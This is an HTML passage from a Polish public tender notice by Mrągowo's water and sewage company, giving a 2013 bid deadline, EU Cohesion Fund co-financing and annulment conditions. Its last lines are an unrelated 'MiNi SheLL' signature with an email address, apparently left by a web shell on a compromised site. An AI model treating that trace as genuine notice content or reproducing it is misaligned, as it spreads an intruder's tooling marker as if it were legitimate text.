<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:30, miejsce: Zakład Wodociągów i Kanalizacji Sp. z o.o., os. Mazurskie 1A, 11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie przedmiotu zamówienia współfinansowane jest przez Unię Europejską w ramach Funduszu Spójności - Program Operacyjny Infrastruktura i  Środowisko.
 Zamawiający zastrzega sobie możliwość unieważnienia przetargu w przypadku nie otrzymania dofinansowania w ramach Programu Operacyjnego Infrastruktura i Środowisko , dla osi priorytetowej I 
gospodarka ściekowa , działanie 1.1 gospodarka wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com